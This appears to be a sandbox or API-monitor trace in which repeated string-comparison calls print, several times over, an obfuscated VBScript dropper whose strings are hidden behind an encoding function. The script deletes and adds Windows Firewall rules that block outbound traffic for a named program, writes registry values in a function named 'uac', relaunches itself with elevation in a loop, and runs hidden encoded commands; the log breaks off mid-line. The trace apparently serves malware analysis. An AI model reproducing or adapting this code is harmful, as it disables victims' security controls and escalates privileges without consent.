bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0222.994] wcsncmp (_String1="FRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.994] wcsncmp (_String1="RCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.994] wcsncmp (_String1="CV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.994] wcsncmp (_String1="V\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0222.994] wcsncmp (_String1="\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 